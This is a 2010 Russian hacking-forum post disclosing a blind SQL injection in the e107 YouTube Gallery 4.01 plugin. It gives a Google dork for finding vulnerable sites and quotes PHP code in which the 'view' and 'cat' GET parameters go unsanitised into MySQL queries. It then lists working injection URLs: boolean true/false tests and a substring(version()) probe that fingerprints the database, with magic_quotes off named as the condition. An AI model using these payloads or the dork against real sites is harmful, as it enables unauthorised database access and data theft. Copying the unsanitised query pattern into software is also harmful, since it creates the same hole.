Показать сообщение отдельно
Старый 06.07.2010, 13:31   #9
Strilo4ka
Banned
 
Регистрация: 05.07.2010
Сообщений: 55
Репутация: 13
По умолчанию

YouTube Gallery 4.01

blind SQL inj


inurl:e107_plugins/ytm_gallery - в гугле

ytm.php в корене плагина
PHP код:
 ...if(isset($_GET['view']))
{
$view_movie $_GET['view'];
}... 
PHP код:
...$query06          "
SELECT movie_title, cat_name, cat_auth, input_user, timestamp FROM "
.MPREFIX."er_ytm_gallery_movies gm
LEFT JOIN "
.MPREFIX."er_ytm_gallery_category gg ON gm.movie_category = gg.cat_id
WHERE movie_code = '
$view_movie'";

$result06          mysql_query($query06);
while (
$row06      mysql_fetch_array($result06,MYSQL_ASSOC)) {... 
Ролик выводиться|нет(надо знать movie_code)!
http://e107/e107_plugins/ytm_gallery/ytm.php?view=OtfMIiinJso' and 1=1/* - true
http://e107/e107_plugins/ytm_gallery/ytm.php?view=OtfMIiinJso' and 1=0/* - false

У меня 5 ветка.

ytm.php- тот же файл

PHP код:
...if(isset($_GET['cat']))
{
$movie_cat $_GET['cat'];
}else{
$movie_cat $_POST['cat'];
}... 
PHP код:
...if ($movie_cat){

            
$query05        "SELECT cat_auth FROM ".MPREFIX."er_ytm_gallery_category WHERE cat_id = '$movie_cat'";
            
$result05       mysql_query($query05);
            while (
$row05   mysql_fetch_array($result05,MYSQL_ASSOC)) {
            
$check_auth     $row05['cat_auth'];}

            if(!
check_class($check_auth)) {

                        
$text .= LAN_YTM_PAGE_1;
                        
$ns->tablerender($ym_title $text);
                        require_once(
FOOTERF);
                        exit();... 
http://e107/e107_plugins/ytm_gallery/ytm.php?cat=1'+and+substring((select version()),1,1)=4--+
http://e107/e107_plugins/ytm_gallery/ytm.php?cat=1'+and+substring((select version()),1,1)=5--+ - true

Условие: mg=off
Strilo4ka вне форума   Ответить с цитированием